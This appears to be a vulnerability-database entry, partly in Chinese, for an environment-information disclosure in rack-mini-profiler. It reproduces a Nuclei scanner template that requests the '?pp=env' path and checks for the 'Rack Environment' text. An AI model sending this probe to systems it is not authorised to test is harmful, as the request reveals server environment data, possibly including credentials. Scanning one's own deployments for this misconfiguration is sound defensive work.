rack-mini-profiler: rack-mini-profiler - Environment Information Disclosure

日期: 2025-08-01 | 影响软件: rack-mini-profiler | POC: 已公开

漏洞描述

rack-mini-profiler is prone to environmental information disclosure which could help an attacker formulate additional attacks.

PoC代码[已公开]

id: rack-mini-profiler

info:
  name: rack-mini-profiler - Environment Information Disclosure
  author: vzamanillo
  severity: high
  description: rack-mini-profiler is prone to environmental information disclosure which could help an attacker formulate additional attacks.
  metadata:
    max-request: 1
  tags: config,debug,rails,misconfig,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/?pp=env"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Rack Environment"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220223820f9e8c9cf348101d8fc81414bef85889ba47a0f959235304fe15cf8a3fa022100c66fba4a071c53e12208acc22dd04fbe2a76bc7a62910bd3da7337fce5729daf:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/misconfiguration/rack-mini-profiler.yaml

相关漏洞推荐